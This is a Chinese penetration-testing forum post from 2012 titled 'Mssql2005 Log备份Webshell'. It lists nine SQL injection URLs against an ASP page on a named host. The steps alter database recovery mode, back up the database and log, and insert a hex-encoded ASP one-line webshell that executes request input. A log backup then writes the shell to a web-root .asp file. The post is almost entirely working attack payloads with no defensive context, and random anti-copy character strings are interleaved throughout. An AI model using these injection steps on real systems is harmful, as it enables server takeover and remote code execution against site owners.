中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
2 C* B& {7 i# O, fhttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
  c8 J8 j2 ^. u! w  E
4 @2 m6 K- s2 E第二步：
( Z8 m9 Q8 n# ?5 H% F& a( P' fhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
$ |$ f, {6 }  |9 t9 L/ F
. H8 \, b1 r3 [5 b第三步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
9 y/ D) B  R9 ?# \) I
  _. y1 h) v8 S第四步
2 U  }4 O6 R7 W$ chttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--

第五步
& Q  T/ N( |% c% D% f3 }http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第六步
+ N) M3 J$ A" j7 N% x* _2 X4 a0 Phttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

# ]  I* a7 }3 `$ y* |6 {第七步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

- _: ~: V% ~/ ]0 M! Z3 d& d第八步
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
) e6 X- G3 ~$ T8 i
  H, R: |0 i2 r* U: D; m第九步
+ ]# ~. e0 n' C( o. h# n$ Ghttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2